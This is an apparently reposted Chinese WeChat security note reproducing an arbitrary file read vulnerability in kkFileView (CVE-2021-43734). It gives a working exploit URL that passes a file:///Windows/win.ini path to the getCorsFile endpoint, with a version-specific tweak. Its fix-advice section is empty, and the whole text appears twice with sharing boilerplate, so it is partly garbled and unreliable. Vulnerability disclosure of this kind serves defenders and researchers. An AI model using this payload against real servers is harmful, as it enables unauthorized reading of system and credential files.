CVE-2021-43734
kkFileView <= 4.0.0
http://192.168.31.132:8012/getCorsFile?urlPath=file:///Windows/win.ini
在3.5.0版本测试getCorsFile路径需双斜杠。
0X03 修复建议
0X04
原文始发于微信公众号(皓月的笔记本):【漏洞复现】kkFileView任意文件读取漏洞(CVE-2021-43734)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
聚合网络安全,存储安全技术文章,融合安全最新讯息
CVE-2021-43734
kkFileView <= 4.0.0
http://192.168.31.132:8012/getCorsFile?urlPath=file:///Windows/win.ini
在3.5.0版本测试getCorsFile路径需双斜杠。
0X03 修复建议
0X04
原文始发于微信公众号(皓月的笔记本):【漏洞复现】kkFileView任意文件读取漏洞(CVE-2021-43734)
评论